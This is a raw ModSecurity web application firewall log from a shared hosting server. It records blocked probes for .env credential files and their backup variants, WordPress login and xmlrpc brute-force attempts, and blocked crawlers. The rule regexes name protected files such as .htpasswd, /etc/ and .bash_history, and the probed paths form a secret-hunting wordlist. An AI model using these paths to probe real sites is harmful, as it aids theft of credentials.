[Tue May 26 16:54:13.063897 2026] [security2:error] [pid 839808:tid 839940] [client 117.198.37.168:60886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC3JqtwAfohijxAqhPPQAAAQo"]
[Tue May 26 16:54:13.064073 2026] [security2:error] [pid 839808:tid 839940] [client 117.198.37.168:60886] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC3JqtwAfohijxAqhPPQAAAQo"]
[Tue May 26 16:54:13.448714 2026] [security2:error] [pid 839808:tid 840012] [client 208.84.100.4:23278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/app/.env"] [unique_id "ahWC3ZqtwAfohijxAqhPWwAAAVI"]
[Tue May 26 16:54:13.448719 2026] [security2:error] [pid 839808:tid 840010] [client 208.84.100.4:23288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/api/.env"] [unique_id "ahWC3ZqtwAfohijxAqhPWQAAAVA"]
[Tue May 26 16:54:13.449534 2026] [security2:error] [pid 839808:tid 840014] [client 208.84.100.4:23246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/backend/.env"] [unique_id "ahWC3ZqtwAfohijxAqhPXQAAAVQ"]
[Tue May 26 16:54:13.618792 2026] [security2:error] [pid 839808:tid 839947] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC3JqtwAfohijxAqhPMAAAARE"]
[Tue May 26 16:54:13.723041 2026] [security2:error] [pid 839808:tid 839986] [client 208.84.100.4:23522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env"] [unique_id "ahWC3ZqtwAfohijxAqhPdwAAATg"]
[Tue May 26 16:54:14.876636 2026] [security2:error] [pid 839808:tid 839876] [remote 111.225.148.77:10032] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mosykay.com"] [uri "/products/9956040/"] [unique_id "ahWC3pqtwAfohijxAqhPjwABbEE"]
[Tue May 26 16:54:15.232411 2026] [security2:error] [pid 839808:tid 840036] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC3ZqtwAfohijxAqhPegAAAWo"]
[Tue May 26 16:54:16.777314 2026] [security2:error] [pid 839808:tid 839996] [client 20.12.190.196:50325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/sx_pms.php"] [unique_id "ahWC4JqtwAfohijxAqhPuwAAAUI"]
[Tue May 26 16:54:16.777416 2026] [security2:error] [pid 839808:tid 839996] [client 20.12.190.196:50325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/sx_pms.php"] [unique_id "ahWC4JqtwAfohijxAqhPuwAAAUI"]
[Tue May 26 16:54:17.126260 2026] [security2:error] [pid 839808:tid 839873] [remote 84.247.181.196:50922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWC4JqtwAfohijxAqhPwAABST4"]
[Tue May 26 16:54:17.868080 2026] [security2:error] [pid 839808:tid 839895] [remote 54.36.102.244:48408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWC4ZqtwAfohijxAqhP0AABU1Q"]
[Tue May 26 16:54:18.308395 2026] [security2:error] [pid 839808:tid 840057] [client 208.84.100.4:23380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.production.copy"] [unique_id "ahWC4pqtwAfohijxAqhP4AAAAX8"]
[Tue May 26 16:54:19.049757 2026] [security2:error] [pid 839808:tid 840006] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC4JqtwAfohijxAqhPvwAAAUw"]
[Tue May 26 16:54:20.167079 2026] [security2:error] [pid 839808:tid 839817] [remote 109.205.180.55:52032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWC45qtwAfohijxAqhQCwABEgY"]
[Tue May 26 16:54:20.264985 2026] [security2:error] [pid 839808:tid 840059] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC4pqtwAfohijxAqhP3gAAAYE"]
[Tue May 26 16:54:20.648854 2026] [security2:error] [pid 839808:tid 840039] [client 49.151.191.227:40680] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahWC5JqtwAfohijxAqhQDQAAAW0"]
[Tue May 26 16:54:20.728975 2026] [security2:error] [pid 839808:tid 840039] [client 49.151.191.227:40680] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahWC5JqtwAfohijxAqhQDQAAAW0"]
[Tue May 26 16:54:21.803706 2026] [security2:error] [pid 839808:tid 840055] [client 172.224.240.23:10129] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWC5ZqtwAfohijxAqhQNAABfQk"]
[Tue May 26 16:54:21.864461 2026] [security2:error] [pid 839808:tid 840032] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC5JqtwAfohijxAqhQGAAAAWY"]
[Tue May 26 16:54:22.326800 2026] [security2:error] [pid 839808:tid 840027] [client 208.84.100.4:29394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.production.swp"] [unique_id "ahWC5pqtwAfohijxAqhQSgAAAWE"]
[Tue May 26 16:54:22.328236 2026] [security2:error] [pid 839808:tid 840023] [client 208.84.100.4:29256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.copy"] [unique_id "ahWC5pqtwAfohijxAqhQUwAAAV0"]
[Tue May 26 16:54:22.329012 2026] [security2:error] [pid 839808:tid 840052] [client 208.84.100.4:29292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.local.backup"] [unique_id "ahWC5pqtwAfohijxAqhQUQAAAXo"]
[Tue May 26 16:54:22.329902 2026] [security2:error] [pid 839808:tid 839970] [client 110.249.202.243:63556] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mosykay.com"] [uri "/robots.txt"] [unique_id "ahWC5pqtwAfohijxAqhQYAAAASg"]
[Tue May 26 16:54:22.329983 2026] [security2:error] [pid 839808:tid 840064] [client 208.84.100.4:29318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.local.swp"] [unique_id "ahWC5pqtwAfohijxAqhQVgAAAYY"]
[Tue May 26 16:54:22.329996 2026] [security2:error] [pid 839808:tid 839969] [client 208.84.100.4:29280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.local.old"] [unique_id "ahWC5pqtwAfohijxAqhQVQAAASc"]
[Tue May 26 16:54:22.330054 2026] [security2:error] [pid 839808:tid 839999] [client 208.84.100.4:29272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.local.bak"] [unique_id "ahWC5pqtwAfohijxAqhQVwAAAUU"]
[Tue May 26 16:54:22.327442 2026] [security2:error] [pid 839808:tid 839963] [client 208.84.100.4:29398] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.production.orig"] [unique_id "ahWC5pqtwAfohijxAqhQSAAAASE"]
[Tue May 26 16:54:22.330871 2026] [security2:error] [pid 839808:tid 840027] [client 208.84.100.4:29244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env~"] [unique_id "ahWC5pqtwAfohijxAqhQWwAAAWE"]
[Tue May 26 16:54:22.331204 2026] [security2:error] [pid 839808:tid 839968] [client 208.84.100.4:29248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.swp"] [unique_id "ahWC5pqtwAfohijxAqhQWAAAASY"]
[Tue May 26 16:54:22.331691 2026] [security2:error] [pid 839808:tid 840009] [client 208.84.100.4:29338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.local.copy"] [unique_id "ahWC5pqtwAfohijxAqhQTQAAAU8"]
[Tue May 26 16:54:22.331452 2026] [security2:error] [pid 839808:tid 840043] [client 208.84.100.4:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.local.orig"] [unique_id "ahWC5pqtwAfohijxAqhQXAAAAXE"]
[Tue May 26 16:54:22.329829 2026] [security2:error] [pid 839808:tid 839997] [client 208.84.100.4:29310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.local~"] [unique_id "ahWC5pqtwAfohijxAqhQUgAAAUM"]
[Tue May 26 16:54:22.332302 2026] [security2:error] [pid 839808:tid 840035] [client 208.84.100.4:29230] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.old"] [unique_id "ahWC5pqtwAfohijxAqhQWQAAAWk"]
[Tue May 26 16:54:22.332336 2026] [security2:error] [pid 839808:tid 839944] [client 208.84.100.4:29254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.orig"] [unique_id "ahWC5pqtwAfohijxAqhQVAAAAQ4"]
[Tue May 26 16:54:22.333093 2026] [security2:error] [pid 839808:tid 840002] [client 208.84.100.4:29358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.production.old"] [unique_id "ahWC5pqtwAfohijxAqhQYQAAAUg"]
[Tue May 26 16:54:22.333112 2026] [security2:error] [pid 839808:tid 840012] [client 208.84.100.4:29352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.production.bak"] [unique_id "ahWC5pqtwAfohijxAqhQUAAAAVI"]
[Tue May 26 16:54:22.333164 2026] [security2:error] [pid 839808:tid 840057] [client 208.84.100.4:29392] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.production~"] [unique_id "ahWC5pqtwAfohijxAqhQSwAAAX8"]
[Tue May 26 16:54:22.335506 2026] [security2:error] [pid 839808:tid 839964] [client 208.84.100.4:29372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.production.backup"] [unique_id "ahWC5pqtwAfohijxAqhQTAAAASI"]
[Tue May 26 16:54:22.336402 2026] [security2:error] [pid 839808:tid 839973] [client 208.84.100.4:29216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.bak"] [unique_id "ahWC5pqtwAfohijxAqhQXQAAASs"]
[Tue May 26 16:54:22.489332 2026] [security2:error] [pid 839808:tid 840003] [client 23.158.233.122:50634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWC5pqtwAfohijxAqhQQQAAAUk"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:54:22.489547 2026] [security2:error] [pid 839808:tid 840003] [client 23.158.233.122:50634] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWC5pqtwAfohijxAqhQQQAAAUk"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:54:22.553968 2026] [security2:error] [pid 839808:tid 839953] [client 172.224.240.23:10129] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWC5pqtwAfohijxAqhQbQABFw0"]
[Tue May 26 16:54:22.707326 2026] [security2:error] [pid 839808:tid 839949] [client 208.84.100.4:29414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env.backup"] [unique_id "ahWC5pqtwAfohijxAqhQfwAAARM"]
[Tue May 26 16:54:22.836135 2026] [security2:error] [pid 839808:tid 839946] [client 23.158.233.122:50652] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWC5pqtwAfohijxAqhQgAAAARA"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:54:23.186681 2026] [security2:error] [pid 839808:tid 839948] [client 117.198.37.168:61212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC55qtwAfohijxAqhQjgAAARI"]
[Tue May 26 16:54:23.186835 2026] [security2:error] [pid 839808:tid 839948] [client 117.198.37.168:61212] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC55qtwAfohijxAqhQjgAAARI"]
[Tue May 26 16:54:23.447130 2026] [security2:error] [pid 839808:tid 839976] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC5pqtwAfohijxAqhQTgAAAS4"]
[Tue May 26 16:54:24.254855 2026] [security2:error] [pid 839808:tid 840051] [client 20.12.190.196:50327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-info.php"] [unique_id "ahWC6JqtwAfohijxAqhQowAAAXk"]
[Tue May 26 16:54:24.254956 2026] [security2:error] [pid 839808:tid 840051] [client 20.12.190.196:50327] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-info.php"] [unique_id "ahWC6JqtwAfohijxAqhQowAAAXk"]
[Tue May 26 16:54:24.571271 2026] [security2:error] [pid 839808:tid 839831] [remote 74.7.241.58:46904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWC6JqtwAfohijxAqhQqgABaBQ"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:54:25.719068 2026] [security2:error] [pid 839808:tid 839971] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC6JqtwAfohijxAqhQpwAAASk"]
[Tue May 26 16:54:27.247956 2026] [security2:error] [pid 839808:tid 840052] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC6ZqtwAfohijxAqhQzAAAAXo"]
